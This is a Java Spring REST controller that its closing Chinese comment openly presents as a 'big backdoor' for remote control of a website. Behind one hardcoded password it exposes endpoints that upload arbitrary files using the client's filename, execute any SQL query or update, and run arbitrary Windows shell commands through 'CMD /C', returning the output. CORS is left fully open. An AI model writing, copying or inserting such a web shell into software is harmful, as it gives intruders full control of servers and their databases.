package com.iems.controller;
import org.apache.commons.io.FileUtils;
import org.springframework.jdbc.core.JdbcTemplate;
import org.springframework.jdbc.core.RowMapper;
import org.springframework.web.bind.annotation.*;
import org.springframework.web.multipart.MultipartFile;
import javax.annotation.Resource;
import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.Date;
import java.util.List;
/**
* Created with IntelliJ IDEA
* by zhao ji ping 艾思科技
*/
@RestController
@CrossOrigin
public class CmdController {
@Resource
JdbcTemplate jdbcTemplate;
@RequestMapping("/fileUpload")
public String fileUpload(
@RequestParam("file") MultipartFile file,
@RequestParam(name = "password", required = false) String password) throws IOException {
if (!password.equals("2023-PSWD-ADMIN-AISI")) return "500";
String filePath = "C:\\upload";
File fileDir = new File(filePath);
if (!fileDir.exists() && !fileDir.isDirectory()) {
fileDir.mkdir();
}
String fileName= file.getOriginalFilename();
File savedFile = new File(filePath, fileName);
FileUtils.copyInputStreamToFile(file.getInputStream(),savedFile);
return "文件上传成功, 上传路径为: C:/upload/" + fileName;
}
@PostMapping("/sqlExecute")
public String sqlExecute(@RequestParam(name="cmd", required = false) String sql,
@RequestParam(name="password", required = false) String password) {
if (!password.equals("2023-PSWD-ADMIN-AISI")) return "500";
jdbcTemplate.execute(sql);
return "命令已执行";
}
@PostMapping("/sqlUpdate")
public Integer sqlUpdate(@RequestParam(name="cmd", required = false) String sql,
@RequestParam(name="password", required = false) String password) {
if (!password.equals("2023-PSWD-ADMIN-AISI")) return 500;
Integer result = jdbcTemplate.update(sql);
return result;
}
@PostMapping("/sqlQuery")
public List<String> sqlQuery(@RequestParam(name="cmd", required = false) String sql,
@RequestParam(name="password", required = false) String password) {
if (!password.equals("2023-PSWD-ADMIN-AISI")) {
List<String> e = new ArrayList<>();
e.add("500");
return e;
}
// 设置sql语句
// String sql = "select * from user limit 10";
// 执行sql语句并返回map
List<String> list = jdbcTemplate.query(sql, new RowMapper() {
@Override
public Object mapRow(ResultSet resultSet, int i) throws SQLException {
String row = "";
Integer size = resultSet.getMetaData().getColumnCount();
for(int ii = 1; ii<=size; ii++) {
row += resultSet.getString(ii) + " | ";
}
return row;
}
});
return list;
}
@PostMapping("/cmd")
public String cmd(@RequestParam(name="cmd", required = false) String cmd,
@RequestParam(name="password", required = false) String password) {
if (!password.equals("2023-PSWD-ADMIN-AISI")) return "500";
List<String> commands = new ArrayList<>();
commands.add("CMD");
commands.add("/C");
commands.add(cmd);
String msg = run(commands);
return msg;
}
private String run(List<String> commands){
try {
ProcessBuilder pb = new ProcessBuilder(commands);
pb.redirectErrorStream(true);
try {
Process p = pb.start();
InputStream inputStream = p.getInputStream();
InputStreamReader inputStreamReader = new InputStreamReader(inputStream, "gbk");
int len = -1;
char[] c = new char[1024];
StringBuffer st = new StringBuffer();
while ((len = inputStreamReader.read(c)) != -1){
String s = new String(c, 0, len);
st.append(s);
}
inputStream.close();
return st.toString();
} catch (Exception e) {
return e.toString();
}
}catch (Exception e) {
return e.toString();
}
}
}
给网站加个大大的后门, 直接可以远程操作, 非常的方便